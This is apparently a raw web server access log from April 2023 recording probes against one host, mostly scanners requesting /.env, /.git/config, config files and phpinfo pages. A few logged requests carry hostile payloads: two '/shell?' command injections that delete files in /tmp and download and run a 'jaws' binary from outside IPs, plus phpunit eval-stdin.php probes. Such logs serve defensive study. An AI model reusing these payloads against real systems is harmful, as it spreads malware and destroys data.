135.125.246.110 - - [05/Apr/2023:15:07:00 +0000] "POST / HTTP/1.1" 405 409702 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [05/Apr/2023:15:20:13 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.197.124.179 - - [05/Apr/2023:15:32:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.197.124.179 - - [05/Apr/2023:15:32:55 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:15:59:23 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:16:07:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.110 - - [05/Apr/2023:16:19:54 +0000] "POST / HTTP/1.1" 405 409690 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
61.0.178.51 - - [05/Apr/2023:16:23:31 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
172.104.11.46 - - [05/Apr/2023:16:32:35 +0000] "\x16\x03\x01" 400 226 "-" "-"
54.169.89.107 - - [05/Apr/2023:16:34:20 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
54.169.89.107 - - [05/Apr/2023:16:34:20 +0000] "POST / HTTP/1.1" 405 409766 "-" "Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
18.143.65.79 - - [05/Apr/2023:16:43:29 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
18.143.65.79 - - [05/Apr/2023:16:43:30 +0000] "POST / HTTP/1.1" 405 409755 "-" "Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G981U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
47.254.255.160 - - [05/Apr/2023:16:45:45 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [05/Apr/2023:16:45:46 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.179 - - [05/Apr/2023:16:58:58 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [05/Apr/2023:17:18:51 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:17:37:09 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:17:37:11 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
87.236.176.170 - - [05/Apr/2023:17:39:33 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.15 - - [05/Apr/2023:17:39:35 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
87.236.176.83 - - [05/Apr/2023:17:39:35 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
47.254.255.160 - - [05/Apr/2023:17:56:20 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [05/Apr/2023:17:56:22 +0000] "POST / HTTP/1.1" 405 409715 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [05/Apr/2023:18:21:26 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [05/Apr/2023:18:37:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
179.43.177.242 - - [05/Apr/2023:18:43:44 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
45.79.181.179 - - [05/Apr/2023:18:52:36 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [05/Apr/2023:19:13:19 +0000] "POST / HTTP/1.1" 405 409708 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
205.210.31.129 - - [05/Apr/2023:19:17:41 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [05/Apr/2023:19:56:09 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:20:34:19 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
162.142.125.214 - - [05/Apr/2023:20:40:08 +0000] "\x16\x03\x01\x01*\x01" 400 226 "-" "-"
135.125.246.110 - - [05/Apr/2023:20:45:41 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.181.94 - - [05/Apr/2023:20:53:05 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [05/Apr/2023:21:06:27 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [05/Apr/2023:21:14:39 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [05/Apr/2023:21:41:15 +0000] "POST / HTTP/1.1" 405 409696 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:22:07:27 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:22:07:27 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
134.122.26.255 - - [05/Apr/2023:22:20:19 +0000] "POST /api/v0/id HTTP/1.1" 405 406467 "-" "xxx"
43.154.128.189 - - [05/Apr/2023:22:33:11 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.33.80.243 - - [05/Apr/2023:22:57:02 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.110 - - [05/Apr/2023:23:05:09 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:23:34:09 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:23:34:09 +0000] "POST / HTTP/1.1" 405 409732 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
180.149.125.172 - - [05/Apr/2023:23:38:35 +0000] "GET /c/ HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.172 - - [05/Apr/2023:23:38:36 +0000] "GET /c HTTP/1.1" 200 - "http://13.244.159.169/c/" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:23:51:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.225.74.198 - - [06/Apr/2023:00:00:04 +0000] "GET /config.json HTTP/1.1" 200 - "-" "python-requests/2.28.1"
185.225.74.198 - - [06/Apr/2023:00:00:05 +0000] "GET /config.json/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:00:00:05 +0000] "POST /config.json HTTP/1.1" 405 412459 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:00:00:07 +0000] "POST /config.json/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 414327 "-" "python-requests/2.28.1"
161.97.174.25 - - [06/Apr/2023:00:11:33 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [06/Apr/2023:00:11:34 +0000] "POST / HTTP/1.1" 405 422655 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
205.210.31.8 - - [06/Apr/2023:00:19:23 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.32.162.159 - - [06/Apr/2023:00:28:24 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [06/Apr/2023:00:47:29 +0000] "POST / HTTP/1.1" 405 409704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [06/Apr/2023:00:59:24 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
161.97.174.25 - - [06/Apr/2023:01:08:37 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.97.174.25 - - [06/Apr/2023:01:08:37 +0000] "GET /phpinfo.php HTTP/1.1" 200 24278 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.154.128.189 - - [06/Apr/2023:01:10:43 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
222.222.180.200 - - [06/Apr/2023:01:33:55 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
185.225.74.198 - - [06/Apr/2023:01:44:20 +0000] "GET / HTTP/1.1" 200 8380 "-" "python-requests/2.28.1"
185.225.74.198 - - [06/Apr/2023:01:44:21 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:01:44:21 +0000] "POST / HTTP/1.1" 405 409771 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:01:44:24 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413661 "-" "python-requests/2.28.1"
167.94.138.35 - - [06/Apr/2023:02:04:06 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
167.94.138.35 - - [06/Apr/2023:02:04:07 +0000] "GET / HTTP/1.1" 200 8379 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [06/Apr/2023:02:04:07 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.94.138.35 - - [06/Apr/2023:02:04:08 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [06/Apr/2023:02:04:08 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [06/Apr/2023:02:04:09 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
43.154.128.189 - - [06/Apr/2023:02:28:54 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:02:36:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:02:36:37 +0000] "POST / HTTP/1.1" 405 409710 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.197.124.179 - - [06/Apr/2023:02:38:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
104.197.124.179 - - [06/Apr/2023:02:38:41 +0000] "POST / HTTP/1.1" 405 422639 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
135.125.246.110 - - [06/Apr/2023:02:41:18 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
60.17.116.83 - - [06/Apr/2023:03:02:15 +0000] "GET / HTTP/1.0" 200 41226 "-" "-"
172.104.11.34 - - [06/Apr/2023:03:06:07 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [06/Apr/2023:03:17:22 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.197.124.179 - - [06/Apr/2023:03:20:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.197.124.179 - - [06/Apr/2023:03:20:17 +0000] "POST / HTTP/1.1" 405 409722 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
200.75.149.6 - - [06/Apr/2023:03:23:28 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
43.154.128.189 - - [06/Apr/2023:03:47:10 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:04:08:40 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:04:08:41 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.79.172.21 - - [06/Apr/2023:04:56:11 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [06/Apr/2023:05:05:30 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
205.210.31.23 - - [06/Apr/2023:05:20:09 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.254.196.173 - - [06/Apr/2023:05:36:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.100.102.203 - - [06/Apr/2023:05:37:04 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.215.81.11/jaws;chmod+/tmp/jaws;sh+/tmp/jaws" 400 226 "-" "-"
193.32.162.159 - - [06/Apr/2023:05:43:52 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.246.110 - - [06/Apr/2023:05:50:12 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [06/Apr/2023:06:23:56 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
134.122.135.59 - - [06/Apr/2023:06:29:54 +0000] "GET /tvplay/181442.html HTTP/1.1" 200 - "/tvplay/181442.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
139.162.68.91 - - [06/Apr/2023:06:37:44 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.211.218.242 - - [06/Apr/2023:07:03:19 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:07:06:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:07:06:40 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:07:11:14 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:07:11:14 +0000] "POST / HTTP/1.1" 405 409679 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [06/Apr/2023:07:42:19 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.225.74.198 - - [06/Apr/2023:08:18:01 +0000] "GET /config.json HTTP/1.1" 200 - "-" "python-requests/2.28.1"
185.225.74.198 - - [06/Apr/2023:08:18:01 +0000] "GET /config.json/.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:08:18:02 +0000] "POST /config.json HTTP/1.1" 405 412505 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [06/Apr/2023:08:18:03 +0000] "POST /config.json/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 414311 "-" "python-requests/2.28.1"
104.131.144.14 - - [06/Apr/2023:08:19:02 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 zgrab/0.x"
185.254.196.173 - - [06/Apr/2023:08:34:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:08:34:16 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.128.12 - - [06/Apr/2023:08:51:10 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [06/Apr/2023:09:01:03 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:09:05:29 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:09:05:29 +0000] "POST / HTTP/1.1" 405 409715 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
5.253.115.65 - - [06/Apr/2023:09:16:54 +0000] "GET /.git/config HTTP/1.0" 200 - "-" "Go-http-client/1.1"
147.78.130.98 - - [06/Apr/2023:09:16:55 +0000] "GET / HTTP/1.0" 200 8384 "-" "Go-http-client/1.1"
185.196.22.165 - - [06/Apr/2023:09:16:56 +0000] "GET /metrics HTTP/1.0" 200 - "-" "Go-http-client/1.1"
185.168.9.118 - - [06/Apr/2023:09:16:57 +0000] "GET /v2/ HTTP/1.0" 301 232 "-" "Go-http-client/1.1"
147.78.130.98 - - [06/Apr/2023:09:16:57 +0000] "GET /v2 HTTP/1.0" 200 - "http://13.244.159.169:80/v2/" "Go-http-client/1.1"
159.65.111.248 - - [06/Apr/2023:09:42:18 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
45.83.66.9 - - [06/Apr/2023:09:59:21 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
45.83.64.60 - - [06/Apr/2023:09:59:22 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
185.254.196.173 - - [06/Apr/2023:10:09:13 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:10:09:16 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [06/Apr/2023:10:19:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [06/Apr/2023:10:25:58 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.244.48 - - [06/Apr/2023:10:27:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
